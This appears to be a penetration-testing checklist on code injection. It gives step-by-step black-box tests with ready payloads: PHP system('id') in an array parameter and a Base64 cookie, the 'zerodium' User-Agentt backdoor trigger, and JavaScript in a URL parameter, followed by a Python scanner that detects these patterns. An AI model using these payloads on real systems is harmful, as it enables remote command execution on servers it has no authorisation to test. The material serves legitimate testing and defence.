Code Injection

Check List

Methodology

Black Box

Code Injection via Create Cache File

1

Interact with the target web application and observe that it generates client-side cache files to store application error messages

2

Identify a request sent from the client that includes user-controlled input within an array-based parameter (in this example, the array-based parameter is the one named owa_config)

POST /index.php?owa_do=base.optionsGeneral HTTP/1.1  
Host: analytics.[REDACTED].com  
User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0  
Connection: keep-alive  
Content-Length: 95  
Content-Type: application/x-www-form-urlencoded  
Cookie: owa_p=8aacef0fbef40d5f8d8121ec2cc19aff386329fb030ead140fdf26491bcc5; owa_u=admin;; owa-u=admin; owa_p=8aacef0fbef40d5f8d8121ec2cc19aff386329fb030ead140fdf26491bcc5  
Accept-Encoding: gzip, deflate, br  

owa_action=base.optionsUpdate&owa_nonce=45faa7aae1&owa_config[darkshhadow]=<?php system('id'); ?> <-- Code Injection

3

Send the modified request to the server and observe that the application fails to properly handle the malicious input and generates an error

4

Confirm that the generated error is stored inside a cache file created by the application

5

Access the generated cache file directly through the browser

6

Observe that the injected PHP payload is executed and the command output is written inside the cache file


Code Injection in User-Agent

1

Log into the target site and intercept requests using Burp Suite

2

Note that the target application uses PHP

3

Then make a simple request to the page, intercept the request, and send it to the Repeater

4

Send a normal request to make sure there are no errors, then inject the following value in the user-agent header

GET / HTTP/1.1  
Host: example
Upgrade-Insecure-Requests: 1  
User-Agentt: zerodiumsystem('id');]  <--- Code Injection
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Connection: close

5

Send the request. If the server response shows that the injected code was executed, the Code Injection vulnerability is confirmed


Code Injection in Base64-Encoded Cookie

1

Log into the target site and intercept requests using Burp Suite

2

Intercept a simple request and check if the Cookie parameter is Base64 encoded

GET /dashboard HTTP/1.1
Host: example.com
Cookie: session=VXNlcj10ZXN0dXNlcg==

3

Replace the cookie value with a Base64-encoded payload written in the language the application runs on. Payload before encoding:

<?php system('id'); ?>

Payload after Base64 encoding:

PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

4

Injected request:

GET /dashboard HTTP/1.1
Host: example.com
Cookie: session=PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==

5

Send the request. If the server response shows that the code was executed, the vulnerability is confirmed


Code Injection in URL Parameters

1

Log in to the target site, use the application as a normal user, and intercept requests using Burp Suite

2

Log in to the target site, act as a normal user, examine the features, and intercept requests using Burp Suite

3

On the target site, look for features and requests that fetch an external service or an external URL, such as the targetUrl parameter in the example below

4

Then, in the request, keep the URL parameter pointing at an external resource and inject code in the language the application runs on (JavaScript in this example, via the parseData parameter), like

https://example.com/cms/gather/getArticle?targetUrl=http://jsonplaceholder.typicode.com/posts/1&parseData=return+process.version+||+"Code+Injection+successful"

5

In the response:

{
  "code": 200,
  "msg": "success",
  "source": {
    "userId": 1,
    "id": 1,
    "title": "sunt aut facere repellat provident occaecati excepturi optio reprehenderit",
    "body": "quia et suscipit\nsuscipit recusandae consequuntur expedita et cum\nreprehenderit molestiae ut ut quas totam\nnostrum rerum est autem sunt rem eveniet architecto"
  },
  "data": "uid=0(root) gid=0(root) groups=0(root)\n"
}
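As an added defender-side example (not part of the original checklist), the following Python scanner takes a raw HTTP request and flags the four injection locations walked through above: an array-based body parameter carrying a PHP tag (the cache-file case), the non-standard User-Agentt header, a Base64-encoded cookie that decodes to PHP, and a query parameter carrying JavaScript. The request samples, the pattern list and the function names (inspect_request, scan_value) are constructed for this example; in practice the patterns would be tuned to the backend language.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Patterns that mark a value as code rather than data (PHP or Node backend, as in this page's examples).
CODE_PATTERNS = {
    "php-open-tag": re.compile(r"<\?(php|=)", re.I),
    "shell-call": re.compile(r"(system|exec|shell_exec|passthru|popen)\s*\(", re.I),
    "eval-like": re.compile(r"\b(eval|assert)\s*\(|\breturn\b.*\bprocess\.", re.I),
}
B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")  # values worth trying to Base64-decode

# Constructed sample requests modelled on this page's checklist (not captured traffic).
SAMPLES = {
    "cookie": "GET /dashboard HTTP/1.1\r\nHost: example.com\r\nCookie: session=PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==\r\n\r\n",
    "header": "GET / HTTP/1.1\r\nHost: example\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
    "body": "POST /index.php HTTP/1.1\r\nHost: example\r\n\r\nowa_config[x]=%3C%3Fphp+system%28%27id%27%29%3B+%3F%3E",
    "query": "GET /getArticle?targetUrl=http://example/1&parseData=return+process.version HTTP/1.1\r\nHost: example\r\n\r\n",
    "benign": "GET /dashboard HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\nCookie: session=VXNlcj10ZXN0dXNlcg==\r\n\r\n",
}

def scan_value(where, value):
    # Match the raw value, then (if it looks like Base64) its decoded form as well.
    hits = [f"{where}:{n}" for n, p in CODE_PATTERNS.items() if p.search(value)]
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8", "replace") if B64_RE.match(value) else ""
    except ValueError:  # looked like Base64 but was not
        decoded = ""
    hits += [f"{where}(base64):{n}" for n, p in CODE_PATTERNS.items() if p.search(decoded)]
    return hits

def inspect_request(raw):
    """Return findings for the query, body, cookie and header values of one raw HTTP request."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    findings = []
    for k, v in parse_qsl(urlsplit(request_line.split(" ")[1]).query, keep_blank_values=True):
        findings += scan_value(f"query[{k}]", v)
    for k, v in parse_qsl(body, keep_blank_values=True):
        findings += scan_value(f"body[{k}]", v)
    for line in header_lines:
        name, _, val = line.partition(":")
        name, val = name.strip().lower(), val.strip()
        if name == "user-agentt":  # non-standard header name the zerodium PHP backdoor keyed on
            findings.append(f"header[{name}]:unexpected-header")
        if name == "cookie":
            for ck, _, cv in (c.strip().partition("=") for c in val.split(";")):
                findings += scan_value(f"cookie[{ck}]", cv)
        else:
            findings += scan_value(f"header[{name}]", val)
    return findings
```

Running inspect_request over each entry of SAMPLES flags the injected location in the first four and returns nothing for the benign request, whose cookie decodes to plain data.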

White Box

Cheat Sheet
